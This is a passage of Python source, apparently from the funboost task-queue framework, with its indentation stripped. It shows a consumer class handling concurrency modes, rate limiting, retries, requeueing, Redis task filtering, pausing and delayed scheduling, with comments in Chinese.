# 方便点击跳转定位到当前解释器下所有实例化消费者的文件行,点击可跳转到该处。
# 获取被调用函数在被调用时所处代码行数
# 直接实例化相应的类和使用工厂模式来实例化相应的类,得到的消费者实际实例化的行是不一样的,希望定位到用户的代码处,而不是定位到工厂模式处。也不要是boost装饰器本身处。
line = sys._getframe(0).f_back.f_lineno
# 获取被调用函数所在模块文件名
file_name = sys._getframe(1).f_code.co_filename
if 'consumer_factory.py' in file_name:
line = sys._getframe(1).f_back.f_lineno
file_name = sys._getframe(2).f_code.co_filename
if r'funboost\__init__.py' in file_name or 'funboost/__init__.py' in file_name:
line = sys._getframe(2).f_back.f_lineno
file_name = sys._getframe(3).f_code.co_filename
if r'funboost\helpers.py' in file_name or 'funboost/helpers.py' in file_name:
line = sys._getframe(3).f_back.f_lineno
file_name = sys._getframe(4).f_code.co_filename
current_queue__info_dict['where_to_instantiate'] = f'{file_name}:{line}'
self._queue_name = queue_name
self.queue_name = queue_name # 可以换成公有的,免得外部访问有警告。
if consuming_function is None:
raise ValueError('必须传 consuming_function 参数')
self.consuming_function = consuming_function
self._consumin_function_decorator = consumin_function_decorator
self._function_timeout = function_timeout
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
if qps != 0 and concurrent_num == 50:
self._concurrent_num = 500
else:
self._concurrent_num = concurrent_num
self._specify_concurrent_pool = specify_concurrent_pool
self._specify_async_loop = specify_async_loop
self._concurrent_pool = None
self._concurrent_mode = concurrent_mode
self._max_retry_times = max_retry_times
self._is_print_detail_exception = is_print_detail_exception
self._is_show_message_get_from_broker = is_show_message_get_from_broker
self._qps = qps
self._msg_schedule_time_intercal = 0 if qps == 0 else 1.0 / qps
self._is_using_distributed_frequency_control = is_using_distributed_frequency_control
self._is_send_consumer_hearbeat_to_redis = is_send_consumer_hearbeat_to_redis or is_using_distributed_frequency_control
self._msg_expire_senconds = msg_expire_senconds
if self._concurrent_mode not in (1, 2, 3, 4, 5, 6):
raise ValueError('设置的并发模式不正确')
self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
if self._concurrent_mode == ConcurrentModeEnum.ASYNC:
self._run = self._async_run # 这里做了自动转化,使用async_run代替run
self._logger_prefix = logger_prefix
self._log_level = log_level
if logger_prefix != '':
logger_prefix += '--'
# logger_name = f'{logger_prefix}{self.__class__.__name__}--{concurrent_name}--{queue_name}--{self.consuming_function.__name__}'
logger_name = f'{logger_prefix}{self.__class__.__name__}--{queue_name}'
# nb_print(logger_name)
self._create_logger_file = create_logger_file
self._log_level = log_level
log_file_handler_type = 1
if int(os.getenv('is_fsdf_remote_run', 0)) == 1: # 这个是远程部署的自动的环境变量,用户不需要亲自自己设置这个值。
log_file_handler_type = 5 # 如果是fabric_deploy 自动化远程部署函数时候,python -c 启动的使用第一个filehandler没记录文件,现在使用第5种filehandler。
self.logger = get_logger(logger_name, log_level_int=log_level, log_filename=f'{logger_name}.log' if create_logger_file else None,
log_file_handler_type=log_file_handler_type,
formatter_template=funboost_config_deafult.NB_LOG_FORMATER_INDEX_FOR_CONSUMER_AND_PUBLISHER, )
# self.logger.info(f'{self.__class__} 在 {current_queue__info_dict["where_to_instantiate"]} 被实例化')
stdout_write(f'{time.strftime("%H:%M:%S")} "{current_queue__info_dict["where_to_instantiate"]}" \033[0;37;44m此行 '
f'实例化队列名 {current_queue__info_dict["queue_name"]} 的消费者, 类型为 {self.__class__}\033[0m\n')
# only_print_on_main_process(f'{current_queue__info_dict["queue_name"]} 的消费者配置:\n', un_strict_json_dumps.dict2json(current_queue__info_dict))
if is_main_process:
self.logger.debug(f'{current_queue__info_dict["queue_name"]} 的消费者配置:\n {un_strict_json_dumps.dict2json(current_queue__info_dict)}')
self._do_task_filtering = do_task_filtering
self._redis_filter_key_name = f'filter_zset:{queue_name}' if task_filtering_expire_seconds else f'filter_set:{queue_name}'
filter_class = RedisFilter if task_filtering_expire_seconds == 0 else RedisImpermanencyFilter
self._redis_filter = filter_class(self._redis_filter_key_name, task_filtering_expire_seconds)
self._unit_time_for_count = 10 # 每隔多少秒计数,显示单位时间内执行多少次,暂时固定为10秒。
self._execute_task_times_every_unit_time = 0 # 每单位时间执行了多少次任务。
self._lock_for_count_execute_task_times_every_unit_time = Lock()
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._last_execute_task_time = time.time() # 最近一次执行任务的时间。
self._msg_num_in_broker = 0
self._last_timestamp_when_has_task_in_queue = 0
self._last_timestamp_print_msg_num = 0
self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
self._do_not_run_by_specify_time = do_not_run_by_specify_time # 可以设置在指定的时间段不运行。
self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
self._result_persistence_helper = ResultPersistenceHelper(function_result_status_persistance_conf, queue_name)
self._user_custom_record_process_info_func = user_custom_record_process_info_func
self._is_using_rpc_mode = is_using_rpc_mode
if broker_exclusive_config is None:
broker_exclusive_config = {}
self.broker_exclusive_config = broker_exclusive_config
self._stop_flag = None
self._pause_flag = None # 暂停消费标志,从reids读取
self._last_show_pause_log_time = 0
self._redis_key_stop_flag = f'funboost_stop_flag:{self.queue_name}'
self._redis_key_pause_flag = f'funboost_pause_flag:{self.queue_name}'
# 控频要用到的成员变量
self._last_submit_task_timestamp = 0
self._last_start_count_qps_timestamp = time.time()
self._has_execute_times_in_recent_second = 0
self._publisher_of_same_queue = None
self.consumer_identification = f'{nb_log_config_default.computer_name}_{nb_log_config_default.computer_ip}_' \
f'{time_util.DatetimeConverter().datetime_str.replace(":", "-")}_{os.getpid()}_{id(self)}'
self.consumer_identification_map = {'queue_name': self.queue_name,
'computer_name': nb_log_config_default.computer_name,
'computer_ip': nb_log_config_default.computer_ip,
'process_id': os.getpid(),
'consumer_id': id(self),
'consumer_uuid': str(uuid.uuid4()),
'start_datetime_str': time_util.DatetimeConverter().datetime_str,
'start_timestamp': time.time(),
'hearbeat_datetime_str': time_util.DatetimeConverter().datetime_str,
'hearbeat_timestamp': time.time(),
'consuming_function': self.consuming_function.__name__,
'code_filename': Path(self.consuming_function.__code__.co_filename).as_posix()
}
self._delay_task_scheduler = BackgroundScheduler(timezone=funboost_config_deafult.TIMEZONE)
self._delay_task_scheduler.add_executor(ApschedulerThreadPoolExecutor(2)) # 只是运行submit任务到并发池,不需要很多线程。
self._delay_task_scheduler.add_listener(self._apscheduler_job_miss, EVENT_JOB_MISSED)
self._delay_task_scheduler.start()
self._check_broker_exclusive_config()
self.custom_init()
atexit.register(self.join_shedual_task_thread)
def _check_broker_exclusive_config(self):
if self.broker_exclusive_config:
if set(self.broker_exclusive_config.keys()).issubset(self.BROKER_EXCLUSIVE_CONFIG_KEYS):
self.logger.info(f'当前消息队列中间件能支持特殊独有配置 {self.broker_exclusive_config.keys()}')
else:
self.logger.warning(f'当前消息队列中间件含有不支持的特殊配置 {self.broker_exclusive_config.keys()},能支持的特殊独有配置包括 {self.BROKER_EXCLUSIVE_CONFIG_KEYS}')
def _check_monkey_patch(self):
if self._concurrent_mode == 2:
check_gevent_monkey_patch()
elif self._concurrent_mode == 3:
check_evenlet_monkey_patch()
else:
check_not_monkey()
@property
@decorators.synchronized
def concurrent_pool(self):
return self._concurrent_mode_dispatcher.build_pool()
def custom_init(self):
pass
def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True,
block=True):
"""间隔一段时间,一直循环运行某个方法的装饰器
:param time_sleep :循环的间隔时间
:param is_display_detail_exception
:param exit_if_function_run_sucsess :如果成功了就退出循环
:param block:是否阻塞在当前主线程运行。
"""
def _keep_circulating(func):
@wraps(func)
def __keep_circulating(*args, **kwargs):
# noinspection PyBroadException
def ___keep_circulating():
while 1:
if self._stop_flag == 1:
break
try:
result = func(*args, **kwargs)
if exit_if_function_run_sucsess:
return result
except Exception as e:
msg = func.__name__ + ' 运行出错\n ' + traceback.format_exc(
limit=10) if is_display_detail_exception else str(e)
self.logger.exception(msg)
finally:
time.sleep(time_sleep)
if block:
return ___keep_circulating()
else:
threading.Thread(target=___keep_circulating, ).start()
return __keep_circulating
return _keep_circulating
# noinspection PyAttributeOutsideInit
def start_consuming_message(self):
ConsumersManager.show_all_consumer_info()
# noinspection PyBroadException
try:
self._concurrent_mode_dispatcher.check_all_concurrent_mode()
self._check_monkey_patch()
except Exception:
traceback.print_exc()
os._exit(4444) # noqa
self.logger.warning(f'开始消费 {self._queue_name} 中的消息')
self._distributed_consumer_statistics = DistributedConsumerStatistics(self)
if self._is_send_consumer_hearbeat_to_redis:
self._distributed_consumer_statistics.run()
self.logger.warning(f'启动了分布式环境 使用 redis 的键 hearbeat:{self._queue_name} 统计活跃消费者 ,当前消费者唯一标识为 {self.consumer_identification}')
self.keep_circulating(10, block=False)(self.check_heartbeat_and_message_count)() # 间隔时间最好比self._unit_time_for_count小整数倍,不然日志不准。
if self._do_task_filtering:
self._redis_filter.delete_expire_filter_task_cycle() # 这个默认是RedisFilter类,是个pass不运行。所以用别的消息中间件模式,不需要安装和配置redis。
if self._schedule_tasks_on_main_thread:
self.keep_circulating(1)(self._shedual_task)()
else:
self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
setattr(funboost_config_deafult, 'has_start_a_consumer_flag', 1)
@abc.abstractmethod
def _shedual_task(self):
"""
每个子类必须实现这个的方法,完成如何从中间件取出消息,并将函数和运行参数添加到工作池。
:return:
"""
raise NotImplementedError
def _print_message_get_from_broker(self, broker_name, msg):
if isinstance(msg, (dict, list)):
msg = json.dumps(msg, ensure_ascii=False)
# print(999)
if self._is_show_message_get_from_broker:
self.logger.debug(f'从 {broker_name} 中间件 的 {self._queue_name} 中取出的消息是 {msg}')
def _get_priority_conf(self, kw: dict, broker_task_config_key: str):
broker_task_config = kw['body'].get('extra', {}).get(broker_task_config_key, None)
if broker_task_config is None:
return getattr(self, f'_{broker_task_config_key}', None)
else:
return broker_task_config
# noinspection PyMethodMayBeStatic
def _get_concurrent_info(self):
concurrent_info = ''
''' 影响了日志长度和一丝丝性能。
if self._concurrent_mode == 1:
concurrent_info = f'[{threading.current_thread()} {threading.active_count()}]'
elif self._concurrent_mode == 2:
concurrent_info = f'[{gevent.getcurrent()} {threading.active_count()}]'
elif self._concurrent_mode == 3:
# noinspection PyArgumentList
concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
'''
return concurrent_info
def _run(self, kw: dict, ):
# print(kw)
t_start_run_fun = time.time()
max_retry_times = self._get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'], )
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
self._result_persistence_helper.save_function_result_to_mongo(current_function_result_status)
self._confirm_consume(kw)
if self._get_priority_conf(kw, 'do_task_filtering'):
self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self._get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
if self._get_priority_conf(kw, 'is_using_rpc_mode'):
# print(function_result_status.get_status_dict(without_datetime_obj=
with RedisMixin().redis_db_filter_and_rpc_result.pipeline() as p:
# RedisMixin().redis_db_frame.lpush(kw['body']['extra']['task_id'], json.dumps(function_result_status.get_status_dict(without_datetime_obj=True)))
# RedisMixin().redis_db_frame.expire(kw['body']['extra']['task_id'], 600)
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
with self._lock_for_count_execute_task_times_every_unit_time:
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1: # 有的中间件无法统计或没实现统计队列剩余数量的,统一返回的是-1,不显示这句话。
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
need_time = time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) /
self._distributed_consumer_statistics.active_consumer_num)
msg += f''' ,预计还需要 {need_time}''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
if self._user_custom_record_process_info_func:
self._user_custom_record_process_info_func(current_function_result_status)
def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
t_start = time.time()
function_result_status.run_times = current_retry_times + 1
try:
function_timeout = self._get_priority_conf(kw, 'function_timeout')
function_run0 = self.consuming_function if self._consumin_function_decorator is None else self._consumin_function_decorator(self.consuming_function)
function_run = function_run0 if not function_timeout else self._concurrent_mode_dispatcher.timeout_deco(
function_timeout)(function_run0)
function_result_status.result = function_run(**function_only_params)
if asyncio.iscoroutine(function_result_status.result):
self.logger.critical(f'异步的协程消费函数必须使用 async 并发模式并发,请设置 '
f'消费函数 {self.consuming_function.__name__} 的concurrent_mode 为 ConcurrentModeEnum.ASYNC 或 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(4)
function_result_status.success = True
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(function_result_status.result)[:100] if len(str(function_result_status.result)) < 100 else str(function_result_status.result)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 {function_only_params} '
f' 结果是 {result_str_to_be_print} , {self._get_concurrent_info()} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
self._requeue(kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self._get_priority_conf(kw, 'is_print_detail_exception'))
# traceback.print_exc()
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
async def _async_run(self, kw: dict, ):
# """虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
# 框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
t_start_run_fun = time.time()
max_retry_times = self._get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'], )
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = await self._async_run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body'], ),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
# self._result_persistence_helper.save_function_result_to_mongo(function_result_status)
await simple_run_in_executor(self._result_persistence_helper.save_function_result_to_mongo, current_function_result_status)
await simple_run_in_executor(self._confirm_consume, kw)
if self._get_priority_conf(kw, 'do_task_filtering'):
# self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self._get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
# self._confirm_consume(kw) # 错得超过指定的次数了,就确认消费了。
if self._get_priority_conf(kw, 'is_using_rpc_mode'):
def push_result():
with RedisMixin().redis_db_filter_and_rpc_result.pipeline() as p:
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
await simple_run_in_executor(push_result)
# 异步执行不存在线程并发,不需要加锁。
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1:
if self._msg_num_in_broker != -1: # 有的中间件无法统计或没实现统计队列剩余数量的,统一返回的是-1,不显示这句话。
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
need_time = time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) /
self._distributed_consumer_statistics.active_consumer_num)
msg += f''' ,预计还需要 {need_time}''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
if self._user_custom_record_process_info_func:
await self._user_custom_record_process_info_func(current_function_result_status)
async def _async_run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
"""虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
function_result_status.run_times = current_retry_times + 1
# noinspection PyBroadException
t_start = time.time()
try:
corotinue_obj = self.consuming_function(**function_only_params)
if not asyncio.iscoroutine(corotinue_obj):
self.logger.critical(f'当前设置的并发模式为 async 并发模式,但消费函数不是异步协程函数,'
f'请不要把消费函数 {self.consuming_function.__name__} 的 concurrent_mode 设置为 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(444)
if self._function_timeout == 0:
rs = await corotinue_obj
# rs = await asyncio.wait_for(corotinue_obj, timeout=4)
else:
rs = await asyncio.wait_for(corotinue_obj, timeout=self._function_timeout)
function_result_status.result = rs
function_result_status.success = True
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(rs)[:100] if len(str(rs)) < 100 else str(rs)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,'
f'入参是 【 {function_only_params} 】 ,结果是 {result_str_to_be_print} 。 {corotinue_obj} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
# time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
await asyncio.sleep(1)
# return self._requeue(kw)
await simple_run_in_executor(self._requeue, kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self._get_priority_conf(kw, 'is_print_detail_exception'))
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
@abc.abstractmethod
def _confirm_consume(self, kw):
"""确认消费"""
raise NotImplementedError
def check_heartbeat_and_message_count(self):
self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
if time.time() - self._last_timestamp_print_msg_num > 60:
if self._msg_num_in_broker != -1:
self.logger.info(f'队列 [{self._queue_name}] 中还有 [{self._msg_num_in_broker}] 个任务')
self._last_timestamp_print_msg_num = time.time()
if self._msg_num_in_broker != 0:
self._last_timestamp_when_has_task_in_queue = time.time()
return self._msg_num_in_broker
@abc.abstractmethod
def _requeue(self, kw):
"""重新入队"""
raise NotImplementedError
def _apscheduler_job_miss(self, event):
"""
这是 apscheduler 包的事件钩子。
ev.function_args = job.args
ev.function_kwargs = job.kwargs
ev.function = job.func
:return:
"""
# print(event.scheduled_run_time)
misfire_grace_time = self._get_priority_conf(event.function_kwargs["kw"], 'misfire_grace_time')
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,'
f'比此任务规定的本应该的运行时间 {event.scheduled_run_time} 相比 超过了指定的 {misfire_grace_time} 秒,放弃执行此任务 \n'
f'{event.function_kwargs["kw"]["body"]} ')
self._confirm_consume(event.function_kwargs["kw"])
'''
if self._get_priority_conf(event.function_kwargs["kw"], 'execute_delay_task_even_if_when_task_is_expired') is False:
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} , 此任务放弃执行')
self._confirm_consume(event.function_kwargs["kw"])
else:
self.logger.warning(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} ,'
f'但框架为了防止是任务积压导致消费延后,所以仍然使其运行一次')
event.function(*event.function_args, **event.function_kwargs)
'''
def pause_consume(self):
"""设置队列为暂停消费状态"""
RedisMixin().redis_db_frame.set(self._redis_key_pause_flag, 1)
def continue_consume(self):
"""设置队列为继续消费状态"""
RedisMixin().redis_db_frame.set(self._redis_key_pause_flag, 0)
def _submit_task(self, kw):
while 1: # 这一块的代码为支持暂停消费。
# print(self._pause_flag)
if self._pause_flag == 1:
time.sleep(1)
if time.time() - self._last_show_pause_log_time > 60:
self.logger.warning(f'已设置 {self.queue_name} 队列中的任务为暂停消费')
self._last_show_pause_log_time = time.time()
else:
break
if self._judge_is_daylight():
self._requeue(kw)
time.sleep(self.time_interval_for_check_do_not_run_time)
return
function_only_params = _delete_keys_and_return_new_dict(kw['body'], )
if self._get_priority_conf(kw, 'do_task_filtering') and self._redis_filter.check_value_exists(
function_only_params): # 对函数的参数进行检查,过滤已经执行过并且成功的任务。
self.logger.warning(f'redis的 [{self._redis_filter_key_name}] 键 中 过滤任务 {kw["body"]}')
self._confirm_consume(kw)
return
publish_time = _get_publish_time(kw['body'])
msg_expire_senconds_priority = self._get_priority_conf(kw, 'msg_expire_senconds')
if msg_expire_senconds_priority and time.time() - msg_expire_senconds_priority > publish_time:
self.logger.warning(
f'消息发布时戳是 {publish_time} {kw["body"].get("publish_time_format", "")},距离现在 {round(time.time() - publish_time, 4)} 秒 ,'
f'超过了指定的 {msg_expire_senconds_priority} 秒,丢弃任务')
self._confirm_consume(kw)
return 0
msg_eta = self._get_priority_conf(kw, 'eta')
msg_countdown = self._get_priority_conf(kw, 'countdown')
misfire_grace_time = self._get_priority_conf(kw, 'misfire_grace_time')
run_date = None
# print(kw)
if msg_countdown:
run_date = time_util.DatetimeConverter(kw['body']['extra']['publish_time']).datetime_obj + datetime.timedelta(seconds=msg_countdown)
if msg_eta:
run_date = time_util.DatetimeConverter(msg_eta).datetime_obj
# print(run_date,time_util.DatetimeConverter().datetime_obj)
# print(run_date.timestamp(),time_util.DatetimeConverter().datetime_obj.timestamp())
# print(self.concurrent_pool)
if run_date:
# print(repr(run_date),repr(datetime.datetime.now(tz=pytz.timezone(frame_config.TIMEZONE))))
self._delay_task_scheduler.add_job(self.concurrent_pool.submit, 'date', run_date=run_date, args=(self._run,), kwargs={'kw': kw},
misfire_grace_time=misfire_grace_time)
else:
self.concurrent_pool.submit(self._run, kw)
if self._is_using_distributed_frequency_control: # 如果是需要分布式控频。
active_num = self._distributed_consumer_statistics.active_consumer_num
self._frequency_control(self._qps / active_num, self._msg_schedule_time_intercal * active_num)
else:
self._frequency_control(self._qps, self._msg_schedule_time_intercal)
def _frequency_control(self, qpsx, msg_schedule_time_intercalx):
# 以下是消费函数qps控制代码。无论是单个消费者空频还是分布式消费控频,都是基于直接计算的,没有依赖redis inrc计数,使得控频性能好。
if qpsx == 0: # 不需要控频的时候,就不需要休眠。
return
if qpsx <= 5:
""" 原来的简单版 """
time.sleep(msg_schedule_time_intercalx)
elif 5 < qpsx <= 20:
""" 改进的控频版,防止消息队列中间件网络波动,例如1000qps使用redis,不能每次间隔1毫秒取下一条消息,
如果取某条消息有消息超过了1毫秒,后面不能匀速间隔1毫秒获取,time.sleep不能休眠一个负数来让时光倒流"""
time_sleep_for_qps_control = max((msg_schedule_time_intercalx - (time.time() - self._last_submit_task_timestamp)) * 0.99, 10 ** -3)
# print(time.time() - self._last_submit_task_timestamp)
# print(time_sleep_for_qps_control)
time.sleep(time_sleep_for_qps_control)
self._last_submit_task_timestamp = time.time()
else:
"""基于当前消费者计数的控频,qps很大时候需要使用这种"""
if time.time() - self._last_start_count_qps_timestamp > 1:
self._has_execute_times_in_recent_second = 1
self._last_start_count_qps_timestamp = time.time()
else:
self._has_execute_times_in_recent_second += 1
# print(self._has_execute_times_in_recent_second)
if self._has_execute_times_in_recent_second >= qpsx:
time.sleep((1 - (time.time() - self._last_start_count_qps_timestamp)) * 1)
@decorators.FunctionResultCacher.cached_function_result_for_a_time(120)
def _judge_is_daylight(self):
if self._is_do_not_run_by_specify_time_effect and (
self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]):
self.logger.warning(
f'现在时间是 {time_util.DatetimeConverter()} ,现在时间是在 {self._do_not_run_by_specify_time} 之间,不运行')
return True
def wait_for_possible_has_finish_all_tasks(self, minutes: int = 3):
"""
判断队列所有任务是否消费完成了。
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
一般是和celery一样,是永久运行的后台任务,永远无限死循环去任务执行任务,但有的人有判断是否执行完成的需求。
:param minutes: 消费者连续多少分钟没执行任务任务 并且 消息队列中间件中没有,就判断为消费完成,为了防止是长耗时任务,一般判断完成是真正提供的minutes的2个周期时间。
:return:
"""
if minutes <= 1:
raise ValueError('疑似完成任务,判断时间最少需要设置为3分钟内,最好是是10分钟')
no_task_time = 0
while 1:
# noinspection PyBroadException
message_count = self._msg_num_in_broker
# print(message_count,self._last_execute_task_time,time.time() - self._last_execute_task_time)
if message_count == 0 and self._last_execute_task_time != 0 and (time.time() - self._last_execute_task_time) > minutes * 60:
no_task_time += 30
else:
no_task_time = 0
time.sleep(30)
if no_task_time > minutes * 60:
break
def clear_filter_tasks(self):
RedisMixin().redis_db_frame.delete(self._redis_filter_key_name)
self.logger.warning(f'清空 {self._redis_filter_key_name} 键的任务过滤')
def __str__(self):
return f'队列为 {self.queue_name} 函数为 {self.consuming_function} 的消费者'
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
def __init__(self, consumerx: AbstractConsumer):
self.consumer = consumerx
self._concurrent_mode = self.consumer._concurrent_mode
self.timeout_deco = None
if self._concurrent_mode in (ConcurrentModeEnum.THREADING, ConcurrentModeEnum.SINGLE_THREAD):
self.timeout_deco = decorators.timeout
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
self.timeout_deco = gevent_timeout_deco
elif self._concurrent_mode == ConcurrentModeEnum.EVENTLET:
self.timeout_deco = evenlet_timeout_deco
self.logger.warning(f'{self.consumer} 设置并发模式'
f'为{ConsumersManager.get_concurrent_name_by_concurrent_mode(self._concurrent_mode)}')
def check_all_concurrent_mode(self):
if ConsumersManager.global_concurrent_mode is not None and self.consumer._concurrent_mode != ConsumersManager.global_concurrent_mode:
ConsumersManager.show_all_consumer_info()
# print({self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode})
